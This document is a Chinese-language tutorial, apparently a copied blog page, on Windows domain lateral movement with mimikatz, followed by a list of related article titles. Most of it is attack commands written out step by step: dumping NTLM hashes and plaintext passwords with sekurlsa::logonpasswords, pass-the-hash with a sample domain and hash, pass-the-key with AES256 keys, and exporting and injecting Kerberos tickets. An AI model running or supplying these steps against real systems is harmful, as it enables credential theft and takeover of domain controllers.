(1)管理员运行

(2)必须输入

privilege::debug


(3)在目标主机使用mimikatz获取ntlm hash
winserver 2012R2 之前版本 可以获取到明文密码

sekurlsa::logonpasswords

(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6d043

mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限

(5) aes-256密钥

使用 mimikatz抓取密钥

sekurlsa::ekeys

获取到 aes-25后

sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /aes256:“aes256的值”

需要目标机器上安装 KB2871997补丁 安装了 该补丁后 ,就可以通过AES256密钥 进行哈希传递啦。

票据传递

privilege::debug
sekurlsa::tickets /export

执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi等

使用以下命令 清楚 内存中的票据

kerberos::purge

将票据文件注入内存

kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-YXY.YOUTHBELIEF.COM.kirbi”

“文件名”

在当前终端 退出 mimikatz 然后就可以列出目标目录啦。

除了mimikatz工具 还可以用 kekeo传递票据。

mimikatz使用哈希 ntlm传递 票据传递相关推荐

  1. 【内网学习笔记】21、哈希传递与票据传递

    1.哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式. 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Win ...

  2. 【内网安全】域横向PTHPTKPTT哈希票据传递

    Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...

  3. 内网域横向PTHPTKPTT哈希票据传递

    内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...

  4. 哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较

    Mimikatz在本文章中会用到的命令 privilege::debug #提升权限 sekurlsa::logonpasswords #抓取密码信息 sekurlsa::msv #抓取LM.NTLM ...

  5. 【内网渗透】域横向PTHPTKPTT哈希票据传递

    目录 0x001 相关知识 0x002 域横向移动PTH NTML传递 0x003 域横向移动PTK aes256传递 0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&a ...

  6. 内网横向移动|PTT票据传递横向|Mimikatz Kerberos

    票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NT ...

  7. 内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK(传递密钥)

    目录 PTH(pass-the-hash)传递哈希 Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) 传递票据

  8. 内网渗透之PPT票据传递攻击(Pass the Ticket)

    文章目录 内网渗透之PPT票据传递攻击(Pass the Ticket) 前言 Kerberos 协议& Kerberos 认证原理 Kerberos 认证原理 ASREQ & ASR ...

  9. 域渗透PTT票据传递攻击(Pass the Ticket)

    文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源 ...

最新文章

  1. 逐步创建Data Guard
  2. java juel表达式_activiti 自定义函数解析juel表达式
  3. 接口自动化(四)--数据依赖的处理
  4. 摩尔投票法(力扣- -229. 求众数 II)
  5. python笔记之文件的基本操作和os模块
  6. iphone照片删掉又出现_iPhone手机相册无法加锁应该怎么办?
  7. CF1016F:Road Projects(树形dp)
  8. python中ans的用法_python cx_Oracle基础使用方法
  9. 论文笔记:STD2P: RGBD Semantic Segmentation Using Spatio-Temporal Data-Driven Pooling
  10. mac文件丢失,苹果电脑有没有好用的恢复软件?
  11. 嵌套DIV中的onClick事件在嵌套容器中的连环作用
  12. 交叉火力dsp手机调音软件_可一键调音的车载DSP功放应用
  13. Spyder安装教程只需三步_保姆式无基础 2020/11/7最新版
  14. 爬虫 --- 08. 全站爬取(CrawlSpider), 分布式, 增量式爬虫
  15. hive3.1.2 flink写数据到hive报错Reading or writing ACID table.....
  16. android 页面回滚焦点位置 解决方案
  17. 水箱建模最小二乘法_高位消防水箱考点汇总及历年真题!
  18. 在线电子书阅读微信小程序 毕业设计(4)图书详细页-图书目录
  19. python之函数len()
  20. OpenStack计算节点nove启动报错

热门文章

  1. 极客Java项目实战营郑天民
  2. 用esclipse和Myesclipse创建servlet些许不同
  3. PhotoSweeper for Mac v4.3.0 – 重复照片查找删除工具
  4. BackTrader:性能优化之多股策略速度优化
  5. h5页面背景图在移动端不显示
  6. DiskGenius无损换分区表类型为GUID格式或MBR格式
  7. java中bit和字节的常用知识
  8. python随机数与加权随机数
  9. 第2阶段 第13讲 Servlet进阶(上)
  10. livy使用样例_[Spark]使用Spark的REST服务Livy